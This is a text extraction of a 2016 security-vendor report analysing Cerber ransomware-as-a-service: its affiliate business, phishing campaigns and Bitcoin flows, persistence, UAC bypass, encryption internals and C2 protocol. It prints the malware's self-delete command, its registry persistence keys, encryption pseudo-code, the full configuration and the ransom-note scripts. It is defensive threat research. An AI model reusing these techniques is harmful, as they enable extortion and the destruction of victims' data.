Professional Documents
Culture Documents
AN IN-DEPTH EXPOS ON
CERBER RANSOMWARE-AS-A-SERVICE
AUGUST 15, 2016
TA BLE O F CO N TE N TS
CERBERRING:
AN IN-DEPTH EXPOS ON CERBER RANSOMWARE-AS-A-SERVICE........ 3
THE RANSOMWARE-AS-A-SERVICE ECOSYSTEM...................................... 3
TARGETING THE MASSES............................................................................ 9
FOLLOWING THE MONEY TRAIL.................................................................. 19
CERBER 2...................................................................................................... 22
TECHNICAL DESCRIPTION ......................................................................... 23
MALWARE FUNCTIONALITY AND PAYLOAD........................................... 23
UAC BYPASS............................................................................................ 27
ENCRYPTION PROCESS.......................................................................... 27
NETWORK AND COMMUNICATION........................................................ 33
PROTECTION MECHANISMS.................................................................. 35
DECRYPTION PROCESS.......................................................................... 37
IN CONCLUSION........................................................................................... 42
APPENDICES................................................................................................ 43
APPENDIX A INDICATORS OF COMPROMISE...................................... 44
APPENDIX B CERBER WEB SERVICE.................................................. 45
APPENDIX C CONFIGURATION RESOURCE........................................ 49
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
According to crbr, a unique Bitcoin address generates for each victim. The affiliate can adjust the initial ransom demand, which
doubles after five days if not paid in full. Upon payment, the victim decoder can download a unique decryption tool for his machine.
crbr also mentions that a polite and friendly online support service exists, with a ticketing system embedded in the affiliate panel.
Figure 2: Cerber Affiliate Panel Earn 60% of the Profit, and a 5% Referral Rate
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
A campaign presented in the advertisement achieved 13,491 installs and 116 ransom payments earning a total of $34,800.74
between April and May 2016.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
Another campaign that took place between February and April 2016 resulted in 10,178 installs,164 ransom payments, and generated
a total revenue of $53,458.06.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
10
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
11
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
12
A downloader is attached to each email, either as a document or as an archived Windows-script. Sometimes two files are attached,
but in most cases those files are identical. Although different obfuscations are applied to different downloaders, all downloaders
contact the same domains to pull and execute the final Cerber payload.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
13
Heavy reuse of files was seen in these campaigns, as exact same files were observed used in many attack instances. The following
figure demonstrates the file-distribution as measured over hundreds of infection attempts, emphasizing the repeated use of
downloaders and pictures attached.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
14
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
15
The different wording observed suggests that the first line of text is pseudo-randomly generated in an attempt to mimic legitimate
messages usually sent between colleagues. In particular for those in enterprise environments that review and revise documents on a
regular basis. The second line of text is a name, which appears in the email sender address as well.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
16
After observing for some time, the only notable changes to the email attachments were the documents file extensions. In June,
the file extension .dotm was prevalent, whereas in July it shifted to the .rtf extension. Macro content is disabled by default in most
Microsoft Office setups. Therefore, each document starts with instructions to manually enable the macro content, resulting in the
victim enabling the execution of the embedded downloader. Below the instructions, a long string of Cyrillic characters appears whiteon-white. Presumably, this bypasses automatic mechanisms that flag documents without textual content
Figure 15: A Word Document Prompts The User into Enabling The Malicious Macro Content
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
17
The downloader drops a VBS script which in turn downloads a JPG file. The JPG contains an image, but it also contains the final
Cerber payload as a stub encoded with a 1-byte XOR-key. Once downloaded, the stub is decoded and the payload is executed by
the script.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
18
19
One logical assumption is that the ransom payments are handled in the following way:
20
An analysis of tens of thousands of Bitcoin wallets generated for Cerber ransomware victims reveals the transfer process:
21
CERBER 2
A new version of Cerber, dubbed Cerber 2, was released on July 29. Following the release, some campaigns upgraded to the new
version, but most campaigns still distribute the original version. The new version boasts several improvements, as specified in the
new advertisement published by crbr.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
22
TECHNICAL DESCRIPTION
Overview
First observed in February 2016, Cerber ransomware quickly became one of the most widespread ransomware. Capable of bypassing
the UAC, Cerber demonstrates several VM evasion techniques. Some of these techniques are based on detection of specific
virtualization technology, while others are based on the existence of system certificates.
At runtime, the victims machine randomly generates the keys for the encryption process. A dedicated web view grants the victim the
option to decrypt one file for free as a capability demonstration. Cerber does not require C&C communication to start the encryption
process.
As stated in the advertisement, when Cerber finishes encrypting the victims drive, a prompt appears demanding the ransom
payment within five days. If the deadline is not met, the ransom is doubled to two BTC. Once the victim deposits the money, they
receive the decryption key.
INSTALLATION
The malwares primary goal is to gain system persistence. To do so, it performs the following actions:
Search the victims system for any previous installations of Cerber, by checking if the executable is located at
%APPDATA%\Roaming\{GUID} .If already installed on the system, the execution continues to one of the working modes
(based on the executable command line arguments).
Search the %SYSTEM32% directory for any filename that matches the regular expression ${r1}*${r2}. exe (where r1
and r2 are randomly generated bytes) and not part of the filename list:
23
Once a filename is found, it is used as a name for the malware (further referred to as MALW_NAME).
Create a duplicate copy of its own image and write it to the %APPDATA%\Roaming\{GUID} directory under the name
MALW_NAME.
Set the file time property of the newly copied executable to kernel32.dll file time.
Run the newly copied executable without arguments. This initiates the default encryption working mode by spawning a new
process responsible for encrypting the file system.
Clear all information from registry keys, remove the created link, and terminate using this command:
cmd.exe /d /c taskkill /t /f /im {EXE} > NUL & ping -n 1 127.0.0.1 > NUL & del {EXE} > NUL
WORKING MODES
Cerber has several execution modes, each responsible for a different functionality and defined by command line arguments
given to the main executable file.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
24
Common Functionality
All working modes share some common functionality, including:
Obtain SE_DEBUG_PRIVILEGES required to execute high privileged actions, such as process injection, etc.
Execute the UAC Bypass technique if the process token does not belong to the WinBuiltinAdministratorsSid token.
Create a shortcut (.lnk file) to the malicious executable in the
${USER}\Appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup folder and change the
FileDescription to the MALW_NAME file.
Ensure persistency by setting up the following registry keys:
REG_KEY = CutExtension(MALW_NAME)
HKU\{UserSID}\Software\Microsoft\Windows\CurrentVersion\Run
{REG_KEY} = {PATH_TO_EXE}
HKU\{UserSID}\Software\Microsoft\Windows\CurrentVersion\RunOnce
{REG_KEY} = {PATH_TO_EXE}
HKU\{UserSID}\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Run = {PATH_TO_EXE}
HKU\{UserSID}\Software\Microsoft\Command Processor
AutoRun = {PATH_TO_EXE}
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
25
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
26
UAC Bypass
The ransomware tries to bypass UAC and execute with elevated system privileges:
1. Check if the HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua flag is set.
If not set, Cerber launches in eval mode using the arguments -eval {CurrentProcessID} to terminate the current
execution mode and start the encryption process. If the EnableLua flag is set, Cerber enumerates the %SYSTEM32% folder
to locate files with the following features:
Files with EXE extension and none of the FILE_ATTRIBUTE_SYSTEM and FILE_ATTRIBUTE_HIDDEN file attribute
flags. This EXE file manifest must also contain the following information:
<autoElevate>true</autoElevate>
<requestedExecutionLevel level="requireAdministrator"/>
The EXE files must contain an imported DLL whose name does not start with api-ms-win- and does not appear in
\KnownDlls directory object.
2. Copy the matched DLL (referenced by the EXE file) to the %TEMP% directory using a random name with a tmp extension. It
then patches the first instruction of the DllEntryPoint , redirecting the execution flow to the malicious code, which is
responsible for running Cerber with elevated privileges.
3. Create a randomly named directory using [A-Za-z0-9] characters in the %SYSTEM32% directory.
4. Set the cerber_uac_status property for the Shell_TrayWnd window to FALSE.
5. Create the explorer.exe process in CREATE_SUSPENDED state and inject malicious code inside the explorer.exe
process space.
6. explorer.exe renames the DLL from %TEMP% directory and moves it and the EXE file to the previously created random
directory.
7. explorer.exe starts a EXE process, thus executing malicious code from DLL . The DLL then launches the ransomware
with elevated privileges using eval mode with the arguments -eval {CerberInstanceProcessID}
8. After creating the EXE file, explorer.exe sets cerber_uac_status property to TRUE.
9. Wait until the property name cerber_uac_status iis not set for one minute. If the property is not set, it deletes the DLL
file from the %TEMP% directory and looks for another suitable DLL in the same EXE or looks for a new EXE image.
Encryption Process
The Cerber ransomware uses a combination of symmetric and asymmetric encryption algorithms, encrypting the users data
without communicating with the C&C server.
All encryption keys are randomly generated. RC4 and RSA algorithms are used for file encryption.
If the configuration section's encrypt.multithread flag is set, the ransomware initiates a number of threads for the
encryption process. The number of initiated threads equals the number of processors multiplied by 2.
The ransomware creates three files containing the ransom message in each encrypted folder. The names and the content of
these files can be found in the configuration help_files.files field.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
27
Encryption Preparation
This stage generates a list of files to be encrypted through the following process:
Collects physical drive data with GetLogicalDrives API call. The relevant drives for encryption are:
Drive Type
DRIVE_REMOVABLE
DRIVE_FIXED
DRIVE_RAMDISK
Cerber checks the DOS name of the devices by calling the QueryDosDevice API call. If the DOS device name is equal to
\??\ , it skips the drive.
If the configuration section's encrypt.network flag is enabled, the ransomware also enumerates all shared network drives
and all disk resources on the network, skipping directories specified in the configuration section's blacklisted.folders
field.
It skips files smaller than a value defined in the configuration section's min_file_size field, files contained in the
configuration section's blacklist.files , and files with extensions that do not match the encrypt.files fields.
The rest of the files are added to the list of files to be encrypted.
If the HKCU\Printer\Defaults\(UNIQUE-ID}\Installed key is not present or is equal to 0 and the configuration
section's servers.send_stat flag is set, the ransomware spawns a process in stat mode to send statistical information to
the C&C server.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
28
Encryption Routine
The encryption routine's goal is to encrypt a single file from the file system. Therefore, Cerber uses this routine on every file
marked for encryption (this list is generated in the Encryption Preparation stage).
At first, a 10 byte random alpha-numeric string is generated. Together with the .cerber extension, this string becomes the
encrypted filename. As a result, each encrypted filename exhibits the following pattern: [0-9A-Za-z_-]{10}.cerber .
To encrypt the file, Cerber "steals" the first N bytes from a file. It calculates the number of stolen bytes using the following
algorithm:
rsa_key_size_bytes = (uint16_t)((rsa_key_size >> 3) - 1);
m = rsa_key_size_bytes - 21;
if (rsa_key_size_bytes - 21 >= 0x10)
m = 16;
g_StolenBytesSize = rsa_key_size_bytes - m - 21;
Next, a custom random number generation function generates a 128-bit random RC4 key (further referred to as rc4_key ).
Cerber then splits the file into multiple encryption blocks, determined by the calculation below and based on the configuration
section's max_block_size and max_blocks fields.
int calculate_numof_block (uint32_t dwFilesize, uint32_t dwStolenBytes) {
number_of_blocks = 1;
size_without_stolen_bytes = dwFilesize - dwStolenBytes;
max_block_size_bytes = max_block_size * 1024 * 1024;
max_bytes_per_block = max_block_size_bytes / max_blocks;
if (size_without_stolen_bytes / max_bytes_per_block > max_blocks)
number_of_blocks = max_blocks;
}
return number_of_blocks;
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
29
The encryption routine uses two main data structures to represent the encrypted file:
FileStolenHeader and FileMetaInfo. Structure detail below:
struct FileStolenHeader {
char magic[4] = 'rbrc'; // magic header
uint32_t rand_bytes;
// random bytes
uint16_t u_filename_len; // length of filename in Unicode with 0 byte
uint8_t blocks_number; // number of blocks to encrypt
uint32_t block_size;
// block size
uint16_t bytes_to_steal; // number of bytes to steal
uint32_t murmur_hash_of_stolen_bytes; // murmur3 32 hash of stolen bytes
char rc4_key[16];
// randomly generated RC4 key (rc4_key)
char stolen_bytes[0];
// stolen bytes
};
struct FileMetainfo {
struct FILETIME CreationTime; // original filetime creation
struct FILETIME LastAccessTime; // original filetime last access
struct FILETIME LastWriteTime; // original filetime last write
char original_filename[0];
// original filename
uint64_t r_murmur_hashes_of_blocks[0]; // hashes of blocks to be encrypted with random
4-bytes data salting
};
Cerber encrypts each file block with the RC4 algorithm using the previously generated rc4_key value as the encryption key.
The encrypted blocks then overwrite and replace the original bytes in the file.
After encrypting all file data, the ransomware replaces the stolen bytes from the beginning of a file with random bytes
generated using its custom random number generation function. It encrypts the FileMetainfo structure with the RC4
algorithm using the rc4_key value as the encryption key. The FileStolenHeader structure is then encrypted with the RSA
algorithm using RSA_X_PUB value as the encryption key.
As decrypting the file correctly requires two main data structures, they are then appended to the end of the encrypted file.
The values of the locally generated RSA keys RSA_X_PUB and RSA_X_PRI are also required for the decryption process. They
are therefore retrieved (in an encrypted form) from the registry key
HKCU\Printer\Defaults\(UNIQUE-ID}\Component_01 and also appended to the end of the encrypted file. Before
appending, the keys are decoded using base64 algorithm.
The overall structure of the encrypted file changes depending on the number of encrypted blocks it contains. Listed below are
all the various possibilities:
30
g_Magic_0
g_Magic_1
g_Magic_2
g_Magic_3
=
=
=
=
0x12345678;
0x159A55E5;
0x1F123BB5;
0x5491333;
uint32_t GenerateRandomByte(uint32_t s) {
uint64_t is = 0;
if (!s)
return s;
is = g_Magic_0;
if (g_Magic_0 == 0x12345678)
is = __rdtsc();
g_Magic_0 = g_Magic_1;
g_Magic_1 = g_Magic_2;
g_Magic_2 = g_Magic_3;
g_Magic_3 ^= is ^ ((uint32_t)is << 11) ^ (((uint32_t)is ^ ((uint32_t)is << 11) ^ ((uint32_t)
is >> 11)) >> 8);
}
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
31
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
32
33
Format
Content
MD5_KEY
%02X%02X%02X%02X%02X%02X
PARTNER_ID
%05x
IMAGE_NT_HEADER.ImageOptionalHeader.Checksum
OS
%x
IS_X64
%d
IS_ADMIN
%d
COUNT_FILES
%x
Appears to be the number of files that meet all conditions for being
encrypted
STOP_REASON
%d
COUNTRY
%s
PC_ID
%c%c%c%c-%c%c%c%c%c%c%c%c-%c%c%c%c%c%c%c%c
For both message types, all data is concatenated and converted to lower characters. It calculates the MD5 hash of the
concatenated data and appends only the first hash byte to the message using %02x format.
Finally, Cerber converts the entire data to lower characters once more and transmits it via UDP protocol to the entire network
range specified in the configuration section's servers.statistics.ip field.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
34
Protection Mechanisms
Cerber contains many embedded evasion techniques. However, for these techniques to be enabled, specific flags must be set
in its configuration section. None of the samples we analyzed had all these flags enabled.
Anti-VM
Cerber contains several VM evasion techniques, some based on specific virtualization technology detection, and others on the
existence/absence of system certificates.
Hypervisor
Checks if ECX 31st bit is set after executing cpuid assembly instruction with the EAX register
set to 1.
VirtualBox
C:\WINDOWS\system32\drivers\VBoxMouse.sys
Parallels
QEMU
VMWare
C:\Windows\system32\drivers\vmmouse.sys or C:\Windows\system32\
drivers\vmhgfs.sys
Wine
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
35
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
36
Decryption Process
Cerber starts the decryption process by parsing the decryption configuration embedded in the binary. The configuration is
presented below.
{
"default": {
"tor": "cerberhhyed5frqa",
"site_1": "onion.to",
"site_2": "onion.cab",
"site_3": "onion.nu",
"site_4": "onion.link",
"site_5": "tor2web.org"
},
"encrypt": {
"new_extension": ".cerber",
"multithread": 1
},
"help_files": {
"files": [
{
"file_extension": ".html"
},
{
"file_extension": ".txt"
},
{
"file_extension": ".url"
},
{
"file_extension": ".vbs"
}
],
"files_name": "# DECRYPT MY FILES #"
},
"servers": {
"decryptor": {
"attempts": 5,
"timeout": 2,
"url": "http:\/\/{TOR}.onion\/decryptor\/"
}
},
"global_public_key_size": 256
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
37
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
38
The Captcha solution sends back along with the ENC_RSA_BLOB and KEY_ID. The ENC_RSA_BLOB was previously encoded
using base64 in the URL safe form.
POST /decryptor HTTP
Content-Type: application/x-www-form-urlencoded
captcha=%d&sign=%s&private_key=%s
(CAPTCHA_SOLUTION,
KEY_ID,
ENC_RSA_BLOC_B64)
The C&C server sends a response to the decryptor in the JSON format. The decryptor checks if theerror field from the
response is equal to null . If not, the decryptor assumes that the C&C server side script has found an error and notifies
the victim.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
39
Decryption Routine
The decryption process starts only if it receives a valid response from the C&C server. The process routine goal is to decrypt
each single file from the infected machine. As mentioned earlier in the encryption section, the encrypted file has the following
format (a sample file with one encrypted block is shown).
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
40
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
41
After the process finished, we were notified that the system is successfully decrypted:
IN CONCLUSION
As demonstrated in this report, the Cerber ransomware represents a highly advanced ransomware-as-a-service operation. The
highly profitable business of ransomware is no longer reserved only for skilled attackers. Even the most novice hacker can easily
reach out in closed forums to obtain an undetected ransomware variant and the designated set of command and control (C&C)
infrastructure servers required to easily manage a successful ransomware campaign.
To learn more about the latest ransomware tactics and how to protect against them, read our ransomware whitepaper and watch our
webcast at: https://www.checkpoint.com/resources/preventing-ransomware/.
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
42
APPENDICES
SHA256
2d08ffeba708fb833404d2c320ea4f29365c791d504181e08e3e9b
529f5cf096
Dynamic Indicators
Presence of the following registry keys:
Registry Key
Value Name
Type
HKCU\Printer\Defaults\{UNIQUE-ID}\
Component_00
REG_BINARY
HKCU\Printer\Defaults\{UNIQUE-ID}\
Component_01
REG_BINARY
HKCU\Printer\Defaults\{UNIQUE-ID}\
Installed
REG_DWORD
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
44
Main Page
Web Captcha
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
45
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
46
47
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
48
"global_public_key":
"LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROE
FNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpR
VlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0y
Y29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFR
XZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTK
VwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFye
WlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFE
MEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==",
"antiav": 1,
"encrypt": {
"files": [
[
".contact",
".dbx",
".doc",
".docx",
".jnt",
".jpg",
".mapimail",
".msg",
".oab",
".ods",
".pdf",
".pps",
".ppsm",
".ppt",
".pptm",
".prf",
".pst",
".rar",
".rtf",
".txt",
".wab",
".xls",
".xlsx",
".xml",
".zip",
".1cd",
".3ds",
".3g2",
".3gp",
".7z",
".7zip",
".accdb",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
49
".aoi",
".asf",
".asp",
".aspx",
".asx",
".avi",
".bak",
".cer",
".cfg",
".class",
".config",
".css",
".csv",
".db",
".dds",
".dwg",
".dxf",
".flf",
".flv",
".html",
".idx",
".js",
".key",
".kwm",
".laccdb",
".ldf",
".lit",
".m3u",
".mbx",
".md",
".mdf",
".mid",
".mlb",
".mov",
".mp3",
".mp4",
".mpg",
".obj",
".odt",
".pages",
".php",
".psd",
".pwm",
".rm",
".safe",
".sav",
".save",
".sql",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
50
".srt",
".swf",
".thm",
".vob",
".wav",
".wma",
".wmv",
".xlsb",
".3dm",
".aac",
".ai",
".arw",
".c",
".cdr",
".cls",
".cpi",
".cpp",
".cs",
".db3",
".docm",
".dot",
".dotm",
".dotx",
".drw",
".dxb",
".eps",
".fla",
".flac",
".fxg",
".java",
".m",
".m4v",
".max",
".mdb",
".pcd",
".pct",
".pl",
".potm",
".potx",
".ppam",
".ppsm",
".ppsx",
".pptm",
".ps",
".pspimage",
".r3d",
".rw2",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
51
".sldm",
".sldx",
".svg",
".tga",
".wps",
".xla",
".xlam",
".xlm",
".xlr",
".xlsm",
".xlt",
".xltm",
".xltx",
".xlw",
".act",
".adp",
".al",
".bkp",
".blend",
".cdf",
".cdx",
".cgm",
".cr2",
".crt",
".dac",
".dbf",
".dcr",
".ddd",
".design",
".dtd",
".fdb",
".fff",
".fpx",
".h",
".iif",
".indd",
".jpeg",
".mos",
".nd",
".nsd",
".nsf",
".nsg",
".nsh",
".odc",
".odp",
".oil",
".pas",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
52
".pat",
".pef",
".pfx",
".ptx",
".qbb",
".qbm",
".sas7bdat",
".say",
".st4",
".st6",
".stc",
".sxc",
".sxw",
".tlg",
".wad",
".xlk",
".aiff",
".bin",
".bmp",
".cmt",
".dat",
".dit",
".edb",
".flvv",
".gif",
".groups",
".hdd",
".hpp",
".log",
".m2ts",
".m4p",
".mkv",
".mpeg",
".ndf",
".nvram",
".ogg",
".ost",
".pab",
".pdb",
".pif",
".png",
".qed",
".qcow",
".qcow2",
".rvt",
".st7",
".stm",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
53
".vbox",
".vdi",
".vhd",
".vhdx",
".vmdk",
".vmsd",
".vmx",
".vmxf",
".3fr",
".3pr",
".ab4",
".accde",
".accdr",
".accdt",
".ach",
".acr",
".adb",
".ads",
".agdl",
".ait",
".apj",
".asm",
".awg",
".back",
".backup",
".backupdb",
".bank",
".bay",
".bdb",
".bgt",
".bik",
".bpw",
".cdr3",
".cdr4",
".cdr5",
".cdr6",
".cdrw",
".ce1",
".ce2",
".cib",
".craw",
".crw",
".csh",
".csl",
".db_journal",
".dc2",
".dcs",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
54
".ddoc",
".ddrw",
".der",
".des",
".dgc",
".djvu",
".dng",
".drf",
".dxg",
".eml",
".erbsql",
".erf",
".exf",
".ffd",
".fh",
".fhd",
".gray",
".grey",
".gry",
".hbk",
".ibank",
".ibd",
".ibz",
".iiq",
".incpas",
".jpe",
".kc2",
".kdbx",
".kdc",
".kpdx",
".lua",
".mdc",
".mef",
".mfw",
".mmw",
".mny",
".moneywell",
".mrw",
".myd",
".ndd",
".nef",
".nk2",
".nop",
".nrw",
".ns2",
".ns3",
".ns4",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
55
".nwb",
".nx2",
".nxl",
".nyf",
".odb",
".odf",
".odg",
".odm",
".orf",
".otg",
".oth",
".otp",
".ots",
".ott",
".p12",
".p7b",
".p7c",
".pdd",
".pem",
".plus_muhd",
".plc",
".pot",
".pptx",
".psafe3",
".py",
".qba",
".qbr",
".qbw",
".qbx",
".qby",
".raf",
".rat",
".raw",
".rdb",
".rwl",
".rwz",
".s3db",
".sd0",
".sda",
".sdf",
".sqlite",
".sqlite3",
".sqlitedb",
".sr2",
".srf",
".srw",
".st5",
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
56
".st8",
".std",
".sti",
".stw",
".stx",
".sxd",
".sxg",
".sxi",
".sxm",
".tex",
".wallet",
".wb2",
".wpd",
".x11",
".x3f",
".xis",
".ycbcra",
".yuv"
],
"new_extension": ".cerber",
"network": 0,
"multithread": 1,
"rsa_key_size": 576,
"max_blocks": 5,
"min_file_size": 0,
"max_block_size": 2
},
"servers": {
"statistics": {
"ip": "87.98.128.0/19",
"data_finish": "{MD5_KEY}",
"data_start":
"{MD5_KEY{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}",
"timeout": 1020,
"send_stat": 1,
"port": 6891
}
},
"blacklist": {
"files": [
"bootsect.bak",
"iconcache.db",
"thumbs.db",
"wallet.dat"
],
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
57
"folders": [
":\\$recycle.bin\\",
":\\$windows.~bt\\",
":\\boot\\",
":\\drivers\\",
":\\program files\\",
":\\program files (x86)\\",
":\\programdata\\",
":\\users\\all users\\",
":\\windows\\",
"\\appdata\\local\\",
"\\appdata\\locallow\\",
"\\appdata\\roaming\\",
"\\public\\music\\sample music\\",
"\\public\\pictures\\sample pictures\\",
"\\public\\videos\\sample videos\\",
"\\tor browser\\"
],
"languages": [
1049,
1058,
1059,
1064,
1067,
1068,
1079,
1087,
1088,
1090,
1091,
2072,
2073,
2092,
2115
],
"countries": [
"am",
"az",
"by",
"ge",
"kg",
"kz",
"md",
"ru",
"tm",
"tj",
"ua",
"uz"
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
58
]
},
"debug": 0,
"help_files": {
"files": [
{
"file_body": "\r\n\r\n n
C E R B E R\r\n n
-----------\r\n\r\n\r\n Your documents, photos, databases and other important files have
been encrypted!\r\n\r\n\r\n n To decrypt your files follow the instructions:\r\n\r\n\r\n
--------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https://www.torproject.
org/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n
http://decrypttozxybarc.onion/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this
website\r\n\r\n\r\n -------------------------------------------------------------------------------------- \r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\
u00bb\r\n",
"file_extension": ".txt"
},
{
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n
<link
href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\"
rel=\"stylesheet\">\r\n
<meta charset=\"utf-8\">\r\n
<meta content=\"IE=edge\"
http-equiv=\"X-UA-Compatible\">\r\n
<meta content=\"width=device-width, initialscale=1\" name=\"viewport\">\r\n
<title>C E R B E R</title>\r\n </head>\r\n
<body>\r\n
<div class=\"container\">\r\n
<h3 align=\"center\">C E R B E R</
h3>\r\n
<br />\r\n
<h4>Your documents, photos, databases and other important
files have been encrypted!<br /><br />To decrypt your files follow the instructions:</h4>\
r\n
<br />\r\n
<div class=\"well\">\r\n
<h4>1. Down
load and install the «Tor Browser» from <a href=\"https://www.torproject.org/
download/download-easy.html.en\" target=\"_blank\">https://www.torproject.org/</a></h4>\
r\n
<br />\r\n
<h4>2. Run it</h4>\r\n
<br />\r\n
<h4>3. In the «Tor Browser» open website:<br /><br /><div
class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\"
style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\"
value=\"http://decrypttozxybarc.onion/{PC_ID}\" readonly></div></h4>\r\n
<h4>4. Follow the instructions at this website</h4>\r\n
</div>\
r\n
<br />\r\n
<p style=\"color: #ccc;\">«...Quod me non necat me fortiorem
facit.»</p>\r\n
<br />\r\n
</div>\r\n </body>\r\n</html>\r\n",
"file_extension": ".html"
},
{
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention!
Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases
and other important files have been encrypted!\"\r\nNext",
"file_extension": ".vbs"
}
],
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
59
http://www.census.gov/topics/income-poverty/income.html
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
60